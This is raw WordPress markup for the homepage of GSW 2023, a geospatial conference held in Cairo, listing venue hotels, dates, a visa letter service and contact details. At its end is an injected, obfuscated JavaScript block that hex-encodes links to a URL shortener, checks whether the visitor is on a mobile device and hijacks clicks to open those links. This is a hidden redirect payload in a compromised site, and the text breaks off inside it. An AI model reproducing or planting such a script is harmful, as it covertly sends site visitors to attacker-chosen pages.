8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 